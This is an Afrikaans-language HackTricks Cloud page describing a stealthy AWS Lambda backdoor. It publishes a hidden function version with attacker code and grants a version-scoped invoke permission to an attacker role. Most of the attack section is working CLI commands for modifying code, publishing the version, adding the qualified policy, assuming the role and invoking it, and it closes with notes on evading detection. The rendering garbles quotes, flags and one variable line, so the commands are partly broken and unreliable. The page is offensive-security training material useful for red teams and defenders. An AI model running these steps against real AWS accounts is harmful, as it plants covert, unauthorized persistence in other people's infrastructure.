HackTricks CloudAWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die đŹ Discord group of die telegram group of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
Opsomming
Skep ân versteekte Lambda-weergawe met aanvallerslogika en scope ân resource-gebaseerde beleid na daardie spesifieke weergawe (of alias) deur die --qualifier parameter in lambda add-permission te gebruik. Ken slegs lambda:InvokeFunction toe op arn:aws:lambda:REGION:ACCT:function:FN:VERSION aan ân aanvaller-prinsipaal. Normale aanroepe via die funksienaam of primĂȘre alias bly onaangeraak, terwyl die aanvaller die backdoored weergawe-ARN direk kan aanroep.
Dit is meer stealthy as om ân Function URL bloot te stel en verander nie die primĂȘre verkeer-alias nie.
Vereiste Permissies (aanvaller)
lambda:UpdateFunctionCode,lambda:UpdateFunctionConfiguration,lambda:PublishVersion,lambda:GetFunctionConfigurationlambda:AddPermission(om ân version-geskoorde resource-beleid by te voeg)iam:CreateRole,iam:PutRolePolicy,iam:GetRole,sts:AssumeRole(om ân aanvaller-prinsipaal te simuleer)
Aanvalstappe (CLI)
Publiseer versteekte weergawe, voeg qualifier-geskoorde permissie by, roep aan as aanvaller
```bash # Vars REGION=us-east-1 TARGET_FN=[Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., âmainâ) stays on a clean version
aws lambda create-alias âfunction-name â$TARGET_FNâ âname main âfunction-version âregion â$REGIONâ
1) Build a small backdoor handler and publish as a new version
cat > bdoor.py <<PY import json, os, boto3
def lambda_handler(e, c): ident = boto3.client(sts).get_caller_identity() return {âhtâ: True, âwhoâ: ident, âenvâ: {âfnâ: os.getenv(AWS_LAMBDA_FUNCTION_NAME)}} PY zip bdoor.zip bdoor.py aws lambda update-function-code âfunction-name â$TARGET_FNâ âzip-file fileb://bdoor.zip âregion $REGION aws lambda update-function-configuration âfunction-name â$TARGET_FNâ âhandler bdoor.lambda_handler âregion $REGION until [ â$(aws lambda get-function-configuration âfunction-name â$TARGET_FNâ âregion $REGION âquery LastUpdateStatus âoutput text)â = âSuccessfulâ ]; do sleep 2; done VER=$(aws lambda publish-version âfunction-name â$TARGET_FNâ âregion $REGION âquery Version âoutput text) VER_ARN=$(aws lambda get-function âfunction-name â$TARGET_FN:$VERâ âregion $REGION âquery Configuration.FunctionArn âoutput text) echo âPublished version: $VER ($VER_ARN)â
2) Create an attacker principal and allow only version invocation (same-account simulation)
ATTACK_ROLE_NAME=ht-version-invoker aws iam create-role ârole-name $ATTACK_ROLE_NAME âassume-role-policy-document Version:2012-10-17 >/dev/null cat > /tmp/invoke-policy.json <<POL { âVersionâ: â2012-10-17â, âStatementâ: [{ âEffectâ: âAllowâ, âActionâ: [âlambda:InvokeFunctionâ], âResourceâ: [â$VER_ARNâ] }] } POL aws iam put-role-policy ârole-name $ATTACK_ROLE_NAME âpolicy-name ht-invoke-version âpolicy-document file:///tmp/invoke-policy.json
Add resource-based policy scoped to the version (Qualifier)
aws lambda add-permission
âfunction-name â$TARGET_FNâ
âqualifier â$VERâ
âstatement-id ht-version-backdoor
âaction lambda:InvokeFunction
âprincipal arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME
âregion $REGION
3) Assume the attacker role and invoke only the qualified version
ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME CREDS=$(aws sts assume-role ârole-arn â$ATTACK_ROLE_ARNâ ârole-session-name htInvoke âquery Credentials âoutput json) export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId) export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey) export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken) aws lambda invoke âfunction-name â$VER_ARNâ /tmp/ver-out.json âregion $REGION >/dev/null cat /tmp/ver-out.json
4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
aws lambda remove-permission âfunction-name â$TARGET_FNâ âstatement-id ht-version-backdoor âqualifier â$VERâ âregion $REGION || true
</details>
## Impak
- Verleen 'n stil agterdeur om 'n verborge weergawe van die funksie aan te roep sonder om die primĂȘre alias te wysig of 'n Function URL bloot te stel.
- Beperk blootstelling tot slegs die gespesifiseerde weergawe/alias via die hulpbron-gebaseerde beleid `Qualifier`, wat die opsporingsoppervlak verminder terwyl dit betroubare aanroeping vir die aanvaller-prinsipaal behou.
> [!TIP]
> Leer & oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Ondersteun HackTricks</summary>
>
> - Kyk na die [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Sluit aan by die** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) of die [**telegram group**](https://t.me/peass) of **volg** ons op **Twitter** đŠ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Deel hacking tricks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>